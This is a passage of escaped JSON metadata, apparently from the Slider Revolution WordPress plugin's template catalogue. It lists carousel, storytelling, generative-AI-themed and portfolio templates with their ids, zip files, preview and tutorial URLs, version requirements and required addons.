2\",\"alias\":\"instagram-gallery-carousel-2\",\"zip\":\"instagram-gallery-carousel-2.zip\",\"uid\":\"b6508dd2b1621eb44fc191906712730a\",\"img\":\"instagram-gallery-carousel-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/wordpress-image-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-image-carousel\",\"version\":\"1.0.0\",\"required\":\"6.6.12\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Effortlessly blend your website\'s visual content with your vibrant Instagram feed in a sleek, responsive carousel.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"socialmedia\"],\"plugin_require\":null,\"date\":\"2023-04-17 11:59:00\",\"package\":\"Instagram Gallery Carousel Pack\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Uniquely Display Your Instagram Feed on Your Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-uniquely-display-your-instagram-feed-on-your-website\\/\",\"guide_img\":\"tutorial\\/Instagram-Gallery-Carousel-Pack.png\",\"active\":\"1\",\"package_id\":\"62\",\"installed\":false},\"682\":{\"id\":\"725\",\"title\":\"Instagram Gallery Carousel 3\",\"alias\":\"instagram-gallery-carousel-3\",\"zip\":\"instagram-gallery-carousel-3.zip\",\"uid\":\"bbddb7776d56f9417a5aa1ffd336580c\",\"img\":\"instagram-gallery-carousel-3\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/wordpress-image-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-image-carousel\",\"version\":\"1.0.0\",\"required\":\"6.6.12\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Effortlessly blend your website\'s visual content with your vibrant Instagram feed in a sleek, responsive carousel.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"socialmedia\"],\"plugin_require\":null,\"date\":\"2023-04-17 12:00:51\",\"package\":\"Instagram Gallery Carousel Pack\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Uniquely Display Your Instagram Feed on Your Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-uniquely-display-your-instagram-feed-on-your-website\\/\",\"guide_img\":\"tutorial\\/Instagram-Gallery-Carousel-Pack.png\",\"active\":\"1\",\"package_id\":\"62\",\"installed\":false},\"683\":{\"id\":\"726\",\"title\":\"Instagram Gallery Carousel 4\",\"alias\":\"instagram-gallery-carousel-4\",\"zip\":\"instagram-gallery-carousel-4.zip\",\"uid\":\"191c6f2fc6b1b4d922ac59df22637f04\",\"img\":\"instagram-gallery-carousel-4\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/wordpress-image-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-image-carousel\",\"version\":\"1.0.0\",\"required\":\"6.6.12\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Effortlessly blend your website\'s visual content with your vibrant Instagram feed in a sleek, responsive carousel.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"socialmedia\"],\"plugin_require\":null,\"date\":\"2023-04-17 12:02:42\",\"package\":\"Instagram Gallery Carousel Pack\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Uniquely Display Your Instagram Feed on Your Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-uniquely-display-your-instagram-feed-on-your-website\\/\",\"guide_img\":\"tutorial\\/Instagram-Gallery-Carousel-Pack.png\",\"active\":\"1\",\"package_id\":\"62\",\"installed\":false},\"684\":{\"id\":\"727\",\"title\":\"Instagram Gallery Carousel Pack\",\"alias\":\"instagram-gallery-carousel-pack\",\"zip\":\"\",\"uid\":\"instagram-gallery-carousel-pack\",\"img\":\"packages\\/Instagram-Gallery-Carousel.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/wordpress-image-carousel\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=wordpress-image-carousel\",\"version\":\"1.0.0\",\"required\":\"6.6.12\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Effortlessly blend your website\'s visual content with your vibrant Instagram feed in a sleek, responsive carousel.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"socialmedia\"],\"plugin_require\":null,\"date\":\"2023-05-03 08:57:11\",\"package\":\"Instagram Gallery Carousel Pack\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Uniquely Display Your Instagram Feed on Your Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-uniquely-display-your-instagram-feed-on-your-website\\/\",\"guide_img\":\"tutorial\\/Instagram-Gallery-Carousel-Pack.png\",\"active\":\"1\",\"package_id\":\"62\",\"installed\":false},\"685\":{\"id\":\"728\",\"title\":\"Storytelling Website Template\",\"alias\":\"Storytelling-Website-Template\",\"zip\":\"Storytelling-Website-Template.zip\",\"uid\":\"43a1d7c46025ab8f0b9fc49837f068de\",\"img\":\"Storytelling-Website-Template\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/storytelling-website-template?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=storytelling-website-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">The ultimate solution to captivate your audience with immersive and interactive storytelling experiences.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-bubblemorph-addon\\\\\\/revslider-bubblemorph-addon.php\\\",\\\"name\\\":\\\"BubbleMorph AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-05-04 12:49:03\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"686\":{\"id\":\"729\",\"title\":\"Generative AI Wordpress Template\",\"alias\":\"generative-ai-wordpress-template\",\"zip\":\"\",\"uid\":\"generative-ai-wordpress-template\",\"img\":\"packages\\/Generative-AI-Wordpress-Template.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"website\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-typewriter-addon\\\\\\/revslider-typewriter-addon.php\\\",\\\"name\\\":\\\"Typewriter AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/typewriter-addon\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-beforeafter-addon\\\\\\/revslider-beforeafter-addon.php\\\",\\\"name\\\":\\\"Before After AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"},{\\\"path\\\":\\\"revslider-transitionpack-addon\\\\\\/revslider-transitionpack-addon.php\\\",\\\"name\\\":\\\"Advanced Transitions AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-05-19 11:03:15\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"687\":{\"id\":\"730\",\"title\":\"G AI Hero\",\"alias\":\"G-AI-Hero\",\"zip\":\"packs\\/G-AI-Hero.zip\",\"uid\":\"bddbaf321d5e7fd3c46ad3cf7b684934\",\"img\":\"G-AI-Hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2023-05-19 11:06:43\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"688\":{\"id\":\"731\",\"title\":\"G AI Intro\",\"alias\":\"G-AI-Intro\",\"zip\":\"packs\\/G-AI-Intro.zip\",\"uid\":\"c260d21743606248a98ebc9fe0f7daa0\",\"img\":\"G-AI-Intro\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2023-05-19 11:09:41\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"689\":{\"id\":\"732\",\"title\":\"G AI Logos\",\"alias\":\"G-AI-Logos\",\"zip\":\"packs\\/G-AI-Logos.zip\",\"uid\":\"5e701af3844551f18cf4d45a6853cedd\",\"img\":\"G-AI-Logos\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2023-05-19 11:12:16\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"690\":{\"id\":\"733\",\"title\":\"G AI Images\",\"alias\":\"G-AI-Images\",\"zip\":\"packs\\/G-AI-Images.zip\",\"uid\":\"8862e4e3ce5c3d67f80809d892df54f5\",\"img\":\"G-AI-Images\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2023-05-19 11:14:32\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"691\":{\"id\":\"734\",\"title\":\"G AI Copy\",\"alias\":\"G-AI-Copy\",\"zip\":\"packs\\/G-AI-Copy.zip\",\"uid\":\"067c9615856d2ec6be31b066d82c2306\",\"img\":\"G-AI-Copy\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2023-05-19 11:17:03\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"692\":{\"id\":\"735\",\"title\":\"G AI Tools\",\"alias\":\"G-AI-Tools\",\"zip\":\"packs\\/G-AI-Tools.zip\",\"uid\":\"23805fec299a8ca82659c030a4f16ce5\",\"img\":\"G-AI-Tools\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-beforeafter-addon\\\\\\/revslider-beforeafter-addon.php\\\",\\\"name\\\":\\\"Before After AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-05-19 11:18:36\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"693\":{\"id\":\"736\",\"title\":\"G AI Cases\",\"alias\":\"G-AI-Cases\",\"zip\":\"packs\\/G-AI-Cases.zip\",\"uid\":\"7b474fb1cbc351d00732a51524cc0ae0\",\"img\":\"G-AI-Cases\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2023-05-19 11:22:41\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"694\":{\"id\":\"737\",\"title\":\"G AI Gallery Title\",\"alias\":\"G-AI-Gallery-Title\",\"zip\":\"packs\\/G-AI-Gallery-Title.zip\",\"uid\":\"6e28c3f7027e58537782b95d0290b16e\",\"img\":\"G-AI-Gallery-Title\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2023-05-19 11:24:20\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"695\":{\"id\":\"738\",\"title\":\"G AI Gallery\",\"alias\":\"G-AI-Gallery\",\"zip\":\"packs\\/G-AI-Gallery.zip\",\"uid\":\"9ce2e0db0c4af129329b42169133de12\",\"img\":\"G-AI-Gallery\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2023-05-19 11:26:02\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"696\":{\"id\":\"739\",\"title\":\"G AI Testimonials\",\"alias\":\"G-AI-Testimonials\",\"zip\":\"packs\\/G-AI-Testimonials.zip\",\"uid\":\"2bdff749f895cf484919fa379daa4ce1\",\"img\":\"G-AI-Testimonials\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"2023-05-19 11:29:00\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"697\":{\"id\":\"740\",\"title\":\"G AI Footer\",\"alias\":\"G-AI-Footer\",\"zip\":\"packs\\/G-AI-Footer.zip\",\"uid\":\"756676ee2fb920253d84e0558b9e5c43\",\"img\":\"G-AI-Footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/generative-ai-wordpress-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=generative-ai-wordpress-template\",\"version\":\"1.0.0\",\"required\":\"6.6.13\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Introducing the Generative AI WordPress template, exclusively available on Slider Revolution. Elevate your online presence and captivate your audience with captivating visuals and dynamic content. Embrace the future of design with the Generative AI WordPress template.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2023-05-19 11:31:24\",\"package\":\"Generative AI Wordpress Template Package\",\"package_order\":\"10\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"How to Create a Video Reel That Impresses Your Website Visitors [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-video-reel-that-impresses-your-website-visitors\\/\",\"guide_img\":\"tutorial\\/Generative-AI-Wordpress-Template.png\",\"active\":\"1\",\"package_id\":\"63\",\"installed\":false},\"698\":{\"id\":\"741\",\"title\":\"Visual Design One-Pager\",\"alias\":\"visual-design-one-pager\",\"zip\":\"\",\"uid\":\"visual-design-one-pager\",\"img\":\"packages\\/Visual-Design-One-Pager.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/visual-design-one-page-portfolio-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=visual-design-one-page-portfolio-template\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"800\",\"description\":\"<span class=\\\"ttm_content\\\">Whether you are a web designer, AI artist, 3D designer, digital illustrator, UI\\/UX designer, or photographer, this template is designed to showcase your work in the most impressive way.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"slider\",\"hero\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap AddOn\\\",\\\"url\\\":\\\"https:\\\\\\/\\\\\\/www.themepunch.com\\\\\\/slider-revolution\\\\\\/install-addons\\\\\\/\\\"}]\",\"date\":\"2023-06-05 13:01:18\",\"package\":\"Visual Design One-Pager Package\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Page Portfolio Site in Just Hours [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-one-page-portfolio-site-in-just-hours\\/\",\"guide_img\":\"tutorial\\/Visual-Design-One-Pager.png\",\"active\":\"1\",\"package_id\":\"64\",\"installed\":false},\"699\":{\"id\":\"742\",\"title\":\"Visual Designer Menu\",\"alias\":\"visual-designer-menu\",\"zip\":\"packs\\/visual-designer-menu.zip\",\"uid\":\"5c5177905993ce5e7919d1360f0a264b\",\"img\":\"visual-designer-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/visual-design-one-page-portfolio-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=visual-design-one-page-portfolio-template\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Whether you are a web designer, AI artist, 3D designer, digital illustrator, UI\\/UX designer, or photographer, this template is designed to showcase your work in the most impressive way.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Revolution Base\",\"filter\":[\"hero\"],\"plugin_require\":null,\"date\":\"2023-06-05 13:04:41\",\"package\":\"Visual Design One-Pager Package\",\"package_order\":\"0\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"Page Portfolio Site in Just Hours [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-beautiful-one-page-portfolio-site-in-just-hours\\/\",\"guide_img\":\"tutorial\\/Visual-Design-One-Pager.png\",\"active\":\"1\",\"package_id\":\"64\",\"installed\":false},\"700\":{\"id\":\"743\",\"title\":\"Visual Designer Slider\",\"alias\":\"visual-designer-slider\",\"zip\":\"packs\\/visual-designer-slider.zip\",\"uid\":\"9a48f4a2546c87d311f692aa1a2d70a4\",\"img\":\"visual-designer-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/visual-design-one-page-portfolio-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=visual-design-one-page-portfolio-template\",\"version\":\"1.0.0\",\"required\":\"6.6.14\",\"width\":\"1240\",\"height\":\"900\",\"description\":\"<span class=\\\"ttm_content\\\">Whether you are a web designer, AI artist, 3D designer, digital illustrator, UI\\/UX designer, or photographer, this template is designed to showcase your work in the most impressive way.<\\/span><span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"\",\"cat\":\"Slider Package\",\"filter\":[\"slider\"],\"plugin_require\":\"[{\\\"path\\\":\\\"revslider-mousetrap-addon\\\\\\/revslider-mousetrap-addon.php\\\",\\\"name\\\":\\\"Mousetrap 